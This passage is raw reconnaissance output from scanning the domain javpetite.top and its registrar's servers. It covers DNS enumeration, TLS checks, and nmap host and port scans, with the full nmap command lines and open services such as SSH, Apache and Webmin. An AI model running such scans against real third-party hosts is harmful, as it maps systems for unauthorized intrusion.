647. 81963 IN NS b.root-servers.net.
648. 81963 IN NS d.root-servers.net.
649. 81963 IN NS i.root-servers.net.
650. 81963 IN NS c.root-servers.net.
651. 81963 IN NS e.root-servers.net.
652. 81963 IN NS m.root-servers.net.
653. 81963 IN RRSIG NS 8 0 518400 20191104050000 20191022040000 22545 . V7L2dB4F79xO9lx8hztPB86SYLY35tcInKqSk8aLbD8fvpqah4DWHoDe 2xbqt74EJPvBDnnxjmyB4tREMvAE2pcJYRcXgEXojn3yhrQSsQ3jFs5F PjYgRw0D2xB2yHw8rQ4l16CD7aEVgG+FefFGqt3W+daAM1PO+IYKW0wG ZlUdJNJSe51nOWemZldGoqlKha/wznCidzCCANqSG6ZPNuvTOgIFhRZB drsNOA4MFLWYNYyQpPWFiqtgkB5nZx3ACgXg/VY6Jy/blXbeM75bse+V 1878EtXXH4TdBRmzNhEyyy6uJa9iO9OjpIn2SDrdVRzSlWOKvOH+Pw8i KLe1JA==
654;; Received 525 bytes from 185.93.180.131#53(185.93.180.131) in 164 ms
655
656top. 172800 IN NS a.zdnscloud.com.
657top. 172800 IN NS b.zdnscloud.com.
658top. 172800 IN NS c.zdnscloud.com.
659top. 172800 IN NS d.zdnscloud.com.
660top. 172800 IN NS f.zdnscloud.com.
661top. 172800 IN NS g.zdnscloud.com.
662top. 172800 IN NS i.zdnscloud.com.
663top. 172800 IN NS j.zdnscloud.com.
664top. 86400 IN DS 56384 8 2 BA378C5913404EC654DF544F519B0FB287E140D64DAC5D59E3499623 93C17945
665top. 86400 IN RRSIG DS 8 1 86400 20191104050000 20191022040000 22545 . oqUdwZDVdZmI1qYmcIpdKkOI0Fq7gorySEQtPeZA503uaM5dkOXTh/3G X9t/WAt8gipebIOjEybjxTFen/2Li94lq/SGV3r3Tbxj6eJZ1odNwM7J pr4r2CLObpnShAzX0D8xnMJQusZ7xpGaCRwf0fWk8j/NwXaJloSI9Rz8 vmF04IUF/T9DDZMapoLciaLxbZ78qzU0IK9skKUBkFb7TTgQKjFml2HP Fm7T3tEIozJoYoPE5x2hvH/mqAqe6BKxrYdB9vQvkx/qOlKy8remAOdp /YPIPGR6F0YSJXZEGFWVn4zAjZjCwJHlF2MgD8y73VXUKxRC28XemFH3 BvNkWw==
666;; Received 670 bytes from 192.203.230.10#53(e.root-servers.net) in 302 ms
667
668javpetite.top. 3600 IN NS dns2.registrar-servers.com.
669javpetite.top. 3600 IN NS dns1.registrar-servers.com.
6708h6ph4lv5r53thdd98kpimjjcvc4dh5q.top. 3600 IN NSEC3 1 0 5 3A1B91E364D39AEB 8H6PJ22PASR4QIH6DD9QF7QLMTTNMN3I NS
6718h6ph4lv5r53thdd98kpimjjcvc4dh5q.top. 3600 IN RRSIG NSEC3 8 2 3600 20191101230838 20191019091420 32058 top. JmVJG/f0tH3ksRkUxqT84ovV6H+5WF/D9k3DfASdX6ihwkYlplEXO2CC 0JC/6Nel6BxMsj/8105pJMEBgnM6ZinWMB7yB1HAEGX9/1UT/+OcomEB EFxFqY1mVgHI3U49RtlvL57FJHnzX46KNqaEErR8oEye691la2kATlT2 XBE=
672;; Received 374 bytes from 2401:8d00:1::1#53(i.zdnscloud.com) in 104 ms
673
674javpetite.top. 1799 IN A 185.82.200.52
675javpetite.top. 1800 IN NS dns1.registrar-servers.com.
676javpetite.top. 1800 IN NS dns2.registrar-servers.com.
677;; Received 117 bytes from 2620:74:19::33#53(dns1.registrar-servers.com) in 38 ms
678#######################################################################################################################################
679[*] Performing General Enumeration of Domain: javpetite.top
680[-] DNSSEC is not configured for javpetite.top
681[*] SOA dns1.registrar-servers.com 216.87.155.33
682[*] NS dns1.registrar-servers.com 216.87.155.33
683[*] NS dns1.registrar-servers.com 2620:74:19::33
684[*] NS dns2.registrar-servers.com 216.87.152.33
685[*] NS dns2.registrar-servers.com 2001:502:cbe4::33
686[*] MX eforward2.registrar-servers.com 162.255.118.62
687[*] MX eforward3.registrar-servers.com 162.255.118.61
688[*] MX eforward4.registrar-servers.com 162.255.118.62
689[*] MX eforward5.registrar-servers.com 162.255.118.62
690[*] MX eforward1.registrar-servers.com 162.255.118.61
691[*] A javpetite.top 185.82.200.52
692[*] TXT javpetite.top v=spf1 include:spf.efwd.registrar-servers.com ~all
693[*] Enumerating SRV Records
694[-] No SRV Records Found for javpetite.top
695[+] 0 Records Found
696#######################################################################################################################################
697[*] Processing domain javpetite.top
698[*] Using system resolvers ['185.93.180.131', '194.187.251.67', '38.132.106.139', '192.168.0.1', '2001:18c0:121:6900:724f:b8ff:fefd:5b6a']
699[+] Getting nameservers
700216.87.155.33 - dns1.registrar-servers.com
701216.87.152.33 - dns2.registrar-servers.com
702[-] Zone transfer failed
703
704[+] TXT records found
705"v=spf1 include:spf.efwd.registrar-servers.com ~all"
706
707[+] MX records found, added to target list
70810 eforward2.registrar-servers.com.
70910 eforward3.registrar-servers.com.
71015 eforward4.registrar-servers.com.
71120 eforward5.registrar-servers.com.
71210 eforward1.registrar-servers.com.
713
714[*] Scanning javpetite.top for A records
715185.82.200.52 - javpetite.top
716185.82.200.52 - www.javpetite.top
717#######################################################################################################################################
718
719 AVAILABLE PLUGINS
720 -----------------
721
722 CompressionPlugin
723 OpenSslCipherSuitesPlugin
724 HeartbleedPlugin
725 RobotPlugin
726 CertificateInfoPlugin
727 FallbackScsvPlugin
728 OpenSslCcsInjectionPlugin
729 HttpHeadersPlugin
730 SessionRenegotiationPlugin
731 SessionResumptionPlugin
732 EarlyDataPlugin
733
734
735
736 CHECKING HOST(S) AVAILABILITY
737 -----------------------------
738
739 185.82.200.52:443 => 185.82.200.52
740
741
742
743
744 SCAN RESULTS FOR 185.82.200.52:443 - 185.82.200.52
745 --------------------------------------------------
746
747 * Deflate Compression:
748 OK - Compression disabled
749
750 * OpenSSL Heartbleed:
751 OK - Not vulnerable to Heartbleed
752
753 * Certificate Information:
754 Content
755 SHA1 Fingerprint: c46e6ea4c40d22da6302a416b68bf8a890b8f667
756 Common Name: ygmt.info
757 Issuer: COMODO RSA Domain Validation Secure Server CA
758 Serial Number: 336350573905975174485940211738784696524
759 Not Before: 2017-02-14 00:00:00
760 Not After: 2018-02-14 23:59:59
761 Signature Algorithm: sha256
762 Public Key Algorithm: RSA
763 Key Size: 2048
764 Exponent: 65537 (0x10001)
765 DNS Subject Alternative Names: ['ygmt.info', 'www.ygmt.info']
766
767 Trust
768 Hostname Validation: FAILED - Certificate does NOT match 185.82.200.52
769 Android CA Store (9.0.0_r9): FAILED - Certificate is NOT Trusted: unable to get local issuer certificate
770 Apple CA Store (iOS 12, macOS 10.14, watchOS 5, and tvOS 12):FAILED - Certificate is NOT Trusted: unable to get local issuer certificate
771 Java CA Store (jdk-12.0.1): FAILED - Certificate is NOT Trusted: unable to get local issuer certificate
772 Mozilla CA Store (2019-03-14): FAILED - Certificate is NOT Trusted: unable to get local issuer certificate
773 Windows CA Store (2019-05-27): FAILED - Certificate is NOT Trusted: unable to get local issuer certificate
774 Symantec 2018 Deprecation: OK - Not a Symantec-issued certificate
775 Received Chain: ygmt.info --> Go Daddy Secure Certificate Authority - G2 --> Go Daddy Root Certificate Authority - G2 --> countryName=US, organizationName=The Go Daddy Group, Inc., organizationalUnitName=Go Daddy Class 2 Certification Authority
776 Verified Chain: ERROR - Could not build verified chain (certificate untrusted?)
777 Received Chain Contains Anchor: ERROR - Could not build verified chain (certificate untrusted?)
778 Received Chain Order: FAILED - Certificate chain out of order!
779 Verified Chain contains SHA1: ERROR - Could not build verified chain (certificate untrusted?)
780
781 Extensions
782 OCSP Must-Staple: NOT SUPPORTED - Extension not found
783 Certificate Transparency: NOT SUPPORTED - Extension not found
784
785 OCSP Stapling
786 NOT SUPPORTED - Server did not send back an OCSP response
787
788 * TLSV1_1 Cipher Suites:
789 Forward Secrecy OK - Supported
790 RC4 OK - Not Supported
791
792 Preferred:
793 TLS_DHE_RSA_WITH_CAMELLIA_256_CBC_SHA 256 bits HTTP 200 OK
794 Accepted:
795 TLS_RSA_WITH_CAMELLIA_256_CBC_SHA 256 bits HTTP 200 OK
796 TLS_RSA_WITH_CAMELLIA_128_CBC_SHA 128 bits HTTP 200 OK
797 TLS_RSA_WITH_AES_256_CBC_SHA 256 bits HTTP 200 OK
798 TLS_RSA_WITH_AES_128_CBC_SHA 128 bits HTTP 200 OK
799 TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA 256 bits HTTP 200 OK
800 TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA 128 bits HTTP 200 OK
801 TLS_DHE_RSA_WITH_CAMELLIA_256_CBC_SHA 256 bits HTTP 200 OK
802 TLS_DHE_RSA_WITH_CAMELLIA_128_CBC_SHA 128 bits HTTP 200 OK
803 TLS_DHE_RSA_WITH_AES_256_CBC_SHA 256 bits HTTP 200 OK
804 TLS_DHE_RSA_WITH_AES_128_CBC_SHA 128 bits HTTP 200 OK
805
806 * TLSV1 Cipher Suites:
807 Forward Secrecy OK - Supported
808 RC4 OK - Not Supported
809
810 Preferred:
811 TLS_DHE_RSA_WITH_CAMELLIA_256_CBC_SHA 256 bits HTTP 200 OK
812 Accepted:
813 TLS_RSA_WITH_CAMELLIA_256_CBC_SHA 256 bits HTTP 200 OK
814 TLS_RSA_WITH_CAMELLIA_128_CBC_SHA 128 bits HTTP 200 OK
815 TLS_RSA_WITH_AES_256_CBC_SHA 256 bits HTTP 200 OK
816 TLS_RSA_WITH_AES_128_CBC_SHA 128 bits HTTP 200 OK
817 TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA 256 bits HTTP 200 OK
818 TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA 128 bits HTTP 200 OK
819 TLS_DHE_RSA_WITH_CAMELLIA_256_CBC_SHA 256 bits HTTP 200 OK
820 TLS_DHE_RSA_WITH_CAMELLIA_128_CBC_SHA 128 bits HTTP 200 OK
821 TLS_DHE_RSA_WITH_AES_256_CBC_SHA 256 bits HTTP 200 OK
822 TLS_DHE_RSA_WITH_AES_128_CBC_SHA 128 bits HTTP 200 OK
823
824 * Downgrade Attacks:
825 TLS_FALLBACK_SCSV: OK - Supported
826
827 * TLSV1_2 Cipher Suites:
828 Forward Secrecy OK - Supported
829 RC4 OK - Not Supported
830
831 Preferred:
832 TLS_DHE_RSA_WITH_AES_256_GCM_SHA384 256 bits HTTP 200 OK
833 Accepted:
834 TLS_RSA_WITH_CAMELLIA_256_CBC_SHA 256 bits HTTP 200 OK
835 TLS_RSA_WITH_CAMELLIA_128_CBC_SHA 128 bits HTTP 200 OK
836 TLS_RSA_WITH_AES_256_CBC_SHA 256 bits HTTP 200 OK
837 TLS_RSA_WITH_AES_128_CBC_SHA 128 bits HTTP 200 OK
838 TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384 256 bits HTTP 200 OK
839 TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA384 256 bits HTTP 200 OK
840 TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA 256 bits HTTP 200 OK
841 TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256 128 bits HTTP 200 OK
842 TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA256 128 bits HTTP 200 OK
843 TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA 128 bits HTTP 200 OK
844 TLS_DHE_RSA_WITH_CAMELLIA_256_CBC_SHA 256 bits HTTP 200 OK
845 TLS_DHE_RSA_WITH_CAMELLIA_128_CBC_SHA 128 bits HTTP 200 OK
846 TLS_DHE_RSA_WITH_AES_256_GCM_SHA384 256 bits HTTP 200 OK
847 TLS_DHE_RSA_WITH_AES_256_CBC_SHA256 256 bits HTTP 200 OK
848 TLS_DHE_RSA_WITH_AES_256_CBC_SHA 256 bits HTTP 200 OK
849 TLS_DHE_RSA_WITH_AES_128_GCM_SHA256 128 bits HTTP 200 OK
850 TLS_DHE_RSA_WITH_AES_128_CBC_SHA256 128 bits HTTP 200 OK
851 TLS_DHE_RSA_WITH_AES_128_CBC_SHA 128 bits HTTP 200 OK
852
853 * OpenSSL CCS Injection:
854 OK - Not vulnerable to OpenSSL CCS injection
855
856 * SSLV2 Cipher Suites:
857 Server rejected all cipher suites.
858
859 * SSLV3 Cipher Suites:
860 Server rejected all cipher suites.
861
862 * Session Renegotiation:
863 Client-initiated Renegotiation: OK - Rejected
864 Secure Renegotiation: OK - Supported
865
866 * TLS 1.2 Session Resumption Support:
867 With Session IDs: OK - Supported (5 successful, 0 failed, 0 errors, 5 total attempts).
868 With TLS Tickets: OK - Supported
869
870 * TLSV1_3 Cipher Suites:
871 Server rejected all cipher suites.
872
873 * ROBOT Attack:
874 OK - Not vulnerable
875
876
877 SCAN COMPLETED IN 31.47 S
878 -------------------------
879#######################################################################################################################################
880Domains still to check: 1
881 Checking if the hostname javpetite.top. given is in fact a domain...
882
883Analyzing domain: javpetite.top.
884 Checking NameServers using system default resolver...
885 IP: 216.87.155.33 (United States)
886 HostName: dns1.registrar-servers.com Type: NS
887 HostName: dns3.registrar-servers.com Type: PTR
888 IP: 216.87.152.33 (United States)
889 HostName: dns2.registrar-servers.com Type: NS
890 HostName: d33.verisigndns.com Type: PTR
891
892 Checking MailServers using system default resolver...
893 IP: 162.255.118.62 (United States)
894 HostName: eforward2.registrar-servers.com Type: MX
895 HostName: eforward.web-hosting.com Type: PTR
896 IP: 162.255.118.61 (United States)
897 HostName: eforward3.registrar-servers.com Type: MX
898 HostName: eforward.web-hosting.com Type: PTR
899 IP: 162.255.118.62 (United States)
900 HostName: eforward2.registrar-servers.com Type: MX
901 HostName: eforward.web-hosting.com Type: PTR
902 HostName: eforward4.registrar-servers.com Type: MX
903 IP: 162.255.118.62 (United States)
904 HostName: eforward2.registrar-servers.com Type: MX
905 HostName: eforward.web-hosting.com Type: PTR
906 HostName: eforward4.registrar-servers.com Type: MX
907 HostName: eforward5.registrar-servers.com Type: MX
908 IP: 162.255.118.61 (United States)
909 HostName: eforward3.registrar-servers.com Type: MX
910 HostName: eforward.web-hosting.com Type: PTR
911 HostName: eforward1.registrar-servers.com Type: MX
912
913 Checking the zone transfer for each NS... (if this takes more than 10 seconds, just hit CTRL-C and it will continue. Bug in the libs)
914 No zone transfer found on nameserver 216.87.155.33
915 No zone transfer found on nameserver 216.87.152.33
916
917 Checking SPF record...
918
919 Checking SPF record...
920 WARNING! SPF record allows an entire network to send mails. Probably an ISP network. We are not going to check the entire network by now: 38.101.213.192/28, but only the network IP
921 New IP found: 38.101.213.192
922 WARNING! SPF record allows an entire network to send mails. Probably an ISP network. We are not going to check the entire network by now: 209.105.246.192/28, but only the network IP
923 New IP found: 209.105.246.192
924 WARNING! SPF record allows an entire network to send mails. Probably an ISP network. We are not going to check the entire network by now: 199.229.254.192/27, but only the network IP
925 New IP found: 199.229.254.192
926 WARNING! SPF record allows an entire network to send mails. Probably an ISP network. We are not going to check the entire network by now: 198.54.122.192/26, but only the network IP
927 New IP found: 198.54.122.192
928 WARNING! SPF record allows an entire network to send mails. Probably an ISP network. We are not going to check the entire network by now: 162.255.118.0/26, but only the network IP
929 New IP found: 162.255.118.0
930 WARNING! SPF record allows an entire network to send mails. Probably an ISP network. We are not going to check the entire network by now: 198.54.122.0/28, but only the network IP
931 New IP found: 198.54.122.0
932 WARNING! SPF record allows an entire network to send mails. Probably an ISP network. We are not going to check the entire network by now: 162.255.118.240/29, but only the network IP
933 New IP found: 162.255.118.240
934
935 Checking 192 most common hostnames using system default resolver...
936 IP: 185.82.200.52 (Netherlands)
937 HostName: www.javpetite.top. Type: A
938
939 Checking with nmap the reverse DNS hostnames of every <ip>/24 netblock using system default resolver...
940 Checking netblock 185.82.200.0
941 Checking netblock 216.87.152.0
942 Checking netblock 162.255.118.0
943 Checking netblock 199.229.254.0
944 Checking netblock 38.101.213.0
945 Checking netblock 198.54.122.0
946 Checking netblock 216.87.155.0
947 Checking netblock 209.105.246.0
948
949 Searching for javpetite.top. emails in Google
950
951 Checking 12 active hosts using nmap... (nmap -sn -n -v -PP -PM -PS80,25 -PA -PY -PU53,40125 -PE --reason <ip> -oA <output_directory>/nmap/<ip>.sn)
952 Host 185.82.200.52 is up (reset ttl 64)
953 Host 216.87.152.33 is up (reset ttl 64)
954 Host 162.255.118.62 is up (reset ttl 64)
955 Host 162.255.118.61 is up (reset ttl 64)
956 Host 199.229.254.192 is up (reset ttl 64)
957 Host 38.101.213.192 is up (reset ttl 64)
958 Host 162.255.118.240 is up (reset ttl 64)
959 Host 162.255.118.0 is up (reset ttl 64)
960 Host 198.54.122.192 is up (reset ttl 64)
961 Host 216.87.155.33 is up (echo-reply ttl 58)
962 Host 198.54.122.0 is up (reset ttl 64)
963 Host 209.105.246.192 is up (reset ttl 64)
964
965 Checking ports on every active host using nmap... (nmap -O --reason --webxml --traceroute -sS -sV -sC -Pn -n -v -F <ip> -oA <output_directory>/nmap/<ip>)
966 Scanning ip 185.82.200.52 (www.javpetite.top.):
967 22/tcp open ssh syn-ack ttl 59 OpenSSH 6.7p1 Debian 5+deb8u8 (protocol 2.0)
968 | ssh-hostkey:
969 | 1024 7f:00:73:df:2a:6e:87:58:3f:76:07:05:5f:92:5b:8c (DSA)
970 | 2048 40:01:47:ca:ce:05:1c:b8:30:d2:2c:6d:bc:a7:eb:4c (RSA)
971 |_ 256 9e:0b:2d:8f:86:18:26:96:72:48:2d:12:a3:d0:1a:78 (ED25519)
972 80/tcp open http syn-ack ttl 59 Apache httpd 2.4.10 ((Debian))
973 | http-methods:
974 |_ Supported Methods: POST OPTIONS GET HEAD
975 |_http-server-header: Apache/2.4.10 (Debian)
976 |_http-title: MET-ART FREE TEEN GALLERIES BARELY LEGAL EROTIC PHOTO NUDE NYM...
977 443/tcp open ssl/http syn-ack ttl 59 Apache httpd 2.4.10 ((Debian))
978 |_http-favicon: Unknown favicon MD5: 216B1DF79EDF8917840C49A34B86B823
979 | http-methods:
980 |_ Supported Methods: POST OPTIONS GET HEAD
981 |_http-server-header: Apache/2.4.10 (Debian)
982 |_http-title: Books, videos, photos, fiction and non-fiction of and about yo...
983 | ssl-cert: Subject: commonName=ygmt.info
984 | Subject Alternative Name: DNS:ygmt.info, DNS:www.ygmt.info
985 | Issuer: commonName=COMODO RSA Domain Validation Secure Server CA/organizationName=COMODO CA Limited/stateOrProvinceName=Greater Manchester/countryName=GB
986 | Public Key type: rsa
987 | Public Key bits: 2048
988 | Signature Algorithm: sha256WithRSAEncryption
989 | Not valid before: 2017-02-14T00:00:00
990 | Not valid after: 2018-02-14T23:59:59
991 | MD5: b8e6 d17f a421 4c77 d48e 9e61 b23e 6971
992 |_SHA-1: c46e 6ea4 c40d 22da 6302 a416 b68b f8a8 90b8 f667
993 |_ssl-date: TLS randomness does not represent time
994 10000/tcp open http syn-ack ttl 59 MiniServ 1.910 (Webmin httpd)
995 |_http-favicon: Unknown favicon MD5: 65A103EF6B83A5BBBAB46C83651063C9
996 | http-methods:
997 |_ Supported Methods: GET HEAD POST OPTIONS
998 |_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).
999 OS Info: Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
1000 Scanning ip 216.87.152.33 (d33.verisigndns.com (PTR)):
1001 53/tcp open domain? syn-ack ttl 56
1002 | dns-nsid:
1003 |_ id.server: nnn1-fra6
1004 | fingerprint-strings:
1005 | DNSVersionBindReqTCP:
1006 | version
1007 |_ bind
1008 Scanning ip 162.255.118.62 (eforward5.registrar-servers.com):
1009 587/tcp open smtp syn-ack ttl 50 Exim smtpd 20191015.1020
1010 | smtp-commands: se14.registrar-servers.com Hello nmap.scanme.org [45.131.5.12], SIZE, 8BITMIME, DSN, AUTH PLAIN LOGIN, STARTTLS, HELP,
1011 |_ Commands supported: AUTH STARTTLS HELO EHLO MAIL RCPT DATA BDAT NOOP QUIT RSET HELP
1012 | ssl-cert: Subject: commonName=eforward1.registrar-servers.com
1013 | Subject Alternative Name: DNS:eforward1.registrar-servers.com, DNS:eforward.registrar-servers.com, DNS:eforward2.registrar-servers.com, DNS:eforward3.registrar-servers.com, DNS:eforward4.registrar-servers.com, DNS:eforward5.registrar-servers.com, DNS:se.registrar-servers.com, DNS:se.web-hosting.com, DNS:se14.registrar-servers.com, DNS:se15.registrar-servers.com, DNS:se16.registrar-servers.com, DNS:se17.registrar-servers.com, DNS:se18.registrar-servers.com, DNS:se19.registrar-servers.com, DNS:se20.registrar-servers.com, DNS:se21.registrar-servers.com, DNS:se5.registrar-servers.com, DNS:seq.web-hosting.com, DNS:sequarantine.registrar-servers.com, DNS:sequarantine.web-hosting.com, DNS:smx.registrar-servers.com, DNS:smx.web-hosting.com, DNS:smx1.registrar-servers.com, DNS:smx1.web-hosting.com, DNS:smx2.registrar-servers.com, DNS:smx2.web-hosting.com, DNS:smx3.registrar-servers.com, DNS:smx3.web-hosting.com, DNS:smx4.registrar-servers.com, DNS:smx4.web-hosting.com, DNS:www.se.registrar-servers.com, DNS:www.se.web-hosting.com
1014 | Issuer: commonName=Sectigo RSA Domain Validation Secure Server CA/organizationName=Sectigo Limited/stateOrProvinceName=Greater Manchester/countryName=GB
1015 | Public Key type: rsa
1016 | Public Key bits: 2048
1017 | Signature Algorithm: sha256WithRSAEncryption
1018 | Not valid before: 2019-06-27T00:00:00
1019 | Not valid after: 2020-07-18T23:59:59
1020 | MD5: ecad ac6b 2a41 9e9b 5245 9b22 011b b2f1
1021 |_SHA-1: 0d99 77fa c957 3265 8884 d2db 6e6a 4b60 e379 9f56
1022 |_ssl-date: TLS randomness does not represent time
1023 OS Info: Service Info: Host: se18.registrar-servers.com
1024 Scanning ip 162.255.118.61 (eforward1.registrar-servers.com):
1025 587/tcp open smtp syn-ack ttl 50 Exim smtpd 20191015.1020
1026 | smtp-commands: se18.registrar-servers.com Hello nmap.scanme.org [45.131.5.12], SIZE, 8BITMIME, DSN, AUTH PLAIN LOGIN, STARTTLS, HELP,
1027 |_ Commands supported: AUTH STARTTLS HELO EHLO MAIL RCPT DATA BDAT NOOP QUIT RSET HELP
1028 | ssl-cert: Subject: commonName=eforward1.registrar-servers.com
1029 | Subject Alternative Name: DNS:eforward1.registrar-servers.com, DNS:eforward.registrar-servers.com, DNS:eforward2.registrar-servers.com, DNS:eforward3.registrar-servers.com, DNS:eforward4.registrar-servers.com, DNS:eforward5.registrar-servers.com, DNS:se.registrar-servers.com, DNS:se.web-hosting.com, DNS:se14.registrar-servers.com, DNS:se15.registrar-servers.com, DNS:se16.registrar-servers.com, DNS:se17.registrar-servers.com, DNS:se18.registrar-servers.com, DNS:se19.registrar-servers.com, DNS:se20.registrar-servers.com, DNS:se21.registrar-servers.com, DNS:se5.registrar-servers.com, DNS:seq.web-hosting.com, DNS:sequarantine.registrar-servers.com, DNS:sequarantine.web-hosting.com, DNS:smx.registrar-servers.com, DNS:smx.web-hosting.com, DNS:smx1.registrar-servers.com, DNS:smx1.web-hosting.com, DNS:smx2.registrar-servers.com, DNS:smx2.web-hosting.com, DNS:smx3.registrar-servers.com, DNS:smx3.web-hosting.com, DNS:smx4.registrar-servers.com, DNS:smx4.web-hosting.com, DNS:www.se.registrar-servers.com, DNS:www.se.web-hosting.com
1030 | Issuer: commonName=Sectigo RSA Domain Validation Secure Server CA/organizationName=Sectigo Limited/stateOrProvinceName=Greater Manchester/countryName=GB
1031 | Public Key type: rsa
1032 | Public Key bits: 2048
1033 | Signature Algorithm: sha256WithRSAEncryption
1034 | Not valid before: 2019-06-27T00:00:00
1035 | Not valid after: 2020-07-18T23:59:59
1036 | MD5: ecad ac6b 2a41 9e9b 5245 9b22 011b b2f1
1037 |_SHA-1: 0d99 77fa c957 3265 8884 d2db 6e6a 4b60 e379 9f56
1038 |_ssl-date: TLS randomness does not represent time
1039 OS Info: Service Info: Host: se14.registrar-servers.com
1040 Scanning ip 199.229.254.192 ():
1041 Scanning ip 38.101.213.192 ():
1042 Scanning ip 162.255.118.240 ():
1043 Scanning ip 162.255.118.0 ():
1044 Scanning ip 198.54.122.192 ():
1045 Scanning ip 216.87.155.33 (dns3.registrar-servers.com (PTR)):
1046 53/tcp open domain? syn-ack ttl 58
1047 | dns-nsid:
1048 |_ id.server: nnn1-ams5
1049 | fingerprint-strings:
1050 | DNSVersionBindReqTCP:
1051 | version
1052 |_ bind
1053 Scanning ip 198.54.122.0 ():
1054 Scanning ip 209.105.246.192 ():
1055 WebCrawling domain's web servers... up to 50 max links.
1056
1057 + URL to crawl: http://www.javpetite.top.
1058 + Date: 2019-10-22
1059
1060 + Crawling URL: http://www.javpetite.top.:
1061 + Links:
1062 + Crawling http://www.javpetite.top.
1063 + Searching for directories...
1064 + Searching open folders...
1065
1066
1067 + URL to crawl: https://www.javpetite.top.
1068 + Date: 2019-10-22
1069
1070 + Crawling URL: https://www.javpetite.top.:
1071 + Links:
1072 + Crawling https://www.javpetite.top. ([SSL: CERTIFICATE_VERIFY_FAILED] certificate verify failed (_ssl.c:727))
1073 + Searching for directories...
1074 + Searching open folders...
1075
1076
1077 + URL to crawl: http://www.javpetite.top.:10000
1078 + Date: 2019-10-22
1079
1080 + Crawling URL: http://www.javpetite.top.:10000:
1081 + Links:
1082 + Crawling http://www.javpetite.top.:10000
1083 + Searching for directories...
1084 + Searching open folders...
1085
1086--Finished--
1087Summary information for domain javpetite.top.
1088-----------------------------------------
1089
1090 Domain Ips Information:
1091 IP: 185.82.200.52
1092 HostName: www.javpetite.top. Type: A
1093 Country: Netherlands
1094 Is Active: True (reset ttl 64)
1095 Port: 22/tcp open ssh syn-ack ttl 59 OpenSSH 6.7p1 Debian 5+deb8u8 (protocol 2.0)
1096 Script Info: | ssh-hostkey:
1097 Script Info: | 1024 7f:00:73:df:2a:6e:87:58:3f:76:07:05:5f:92:5b:8c (DSA)
1098 Script Info: | 2048 40:01:47:ca:ce:05:1c:b8:30:d2:2c:6d:bc:a7:eb:4c (RSA)
1099 Script Info: |_ 256 9e:0b:2d:8f:86:18:26:96:72:48:2d:12:a3:d0:1a:78 (ED25519)
1100 Port: 80/tcp open http syn-ack ttl 59 Apache httpd 2.4.10 ((Debian))
1101 Script Info: | http-methods:
1102 Script Info: |_ Supported Methods: POST OPTIONS GET HEAD
1103 Script Info: |_http-server-header: Apache/2.4.10 (Debian)
1104 Script Info: |_http-title: MET-ART FREE TEEN GALLERIES BARELY LEGAL EROTIC PHOTO NUDE NYM...
1105 Port: 443/tcp open ssl/http syn-ack ttl 59 Apache httpd 2.4.10 ((Debian))
1106 Script Info: |_http-favicon: Unknown favicon MD5: 216B1DF79EDF8917840C49A34B86B823
1107 Script Info: | http-methods:
1108 Script Info: |_ Supported Methods: POST OPTIONS GET HEAD
1109 Script Info: |_http-server-header: Apache/2.4.10 (Debian)
1110 Script Info: |_http-title: Books, videos, photos, fiction and non-fiction of and about yo...
1111 Script Info: | ssl-cert: Subject: commonName=ygmt.info
1112 Script Info: | Subject Alternative Name: DNS:ygmt.info, DNS:www.ygmt.info
1113 Script Info: | Issuer: commonName=COMODO RSA Domain Validation Secure Server CA/organizationName=COMODO CA Limited/stateOrProvinceName=Greater Manchester/countryName=GB
1114 Script Info: | Public Key type: rsa
1115 Script Info: | Public Key bits: 2048
1116 Script Info: | Signature Algorithm: sha256WithRSAEncryption
1117 Script Info: | Not valid before: 2017-02-14T00:00:00
1118 Script Info: | Not valid after: 2018-02-14T23:59:59
1119 Script Info: | MD5: b8e6 d17f a421 4c77 d48e 9e61 b23e 6971
1120 Script Info: |_SHA-1: c46e 6ea4 c40d 22da 6302 a416 b68b f8a8 90b8 f667
1121 Script Info: |_ssl-date: TLS randomness does not represent time
1122 Port: 10000/tcp open http syn-ack ttl 59 MiniServ 1.910 (Webmin httpd)
1123 Script Info: |_http-favicon: Unknown favicon MD5: 65A103EF6B83A5BBBAB46C83651063C9
1124 Script Info: | http-methods:
1125 Script Info: |_ Supported Methods: GET HEAD POST OPTIONS
1126 Script Info: |_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).
1127 Os Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
1128 IP: 216.87.152.33
1129 HostName: dns2.registrar-servers.com Type: NS
1130 HostName: d33.verisigndns.com Type: PTR
1131 Country: United States
1132 Is Active: True (reset ttl 64)
1133 Port: 53/tcp open domain? syn-ack ttl 56
1134 Script Info: | dns-nsid:
1135 Script Info: |_ id.server: nnn1-fra6
1136 Script Info: | fingerprint-strings:
1137 Script Info: | DNSVersionBindReqTCP:
1138 Script Info: | version
1139 Script Info: |_ bind
1140 IP: 162.255.118.62
1141 HostName: eforward2.registrar-servers.com Type: MX
1142 HostName: eforward.web-hosting.com Type: PTR
1143 HostName: eforward4.registrar-servers.com Type: MX
1144 HostName: eforward5.registrar-servers.com Type: MX
1145 Country: United States
1146 Is Active: True (reset ttl 64)
1147 Port: 587/tcp open smtp syn-ack ttl 50 Exim smtpd 20191015.1020
1148 Script Info: | smtp-commands: se14.registrar-servers.com Hello nmap.scanme.org [45.131.5.12], SIZE, 8BITMIME, DSN, AUTH PLAIN LOGIN, STARTTLS, HELP,
1149 Script Info: |_ Commands supported: AUTH STARTTLS HELO EHLO MAIL RCPT DATA BDAT NOOP QUIT RSET HELP
1150 Script Info: | ssl-cert: Subject: commonName=eforward1.registrar-servers.com
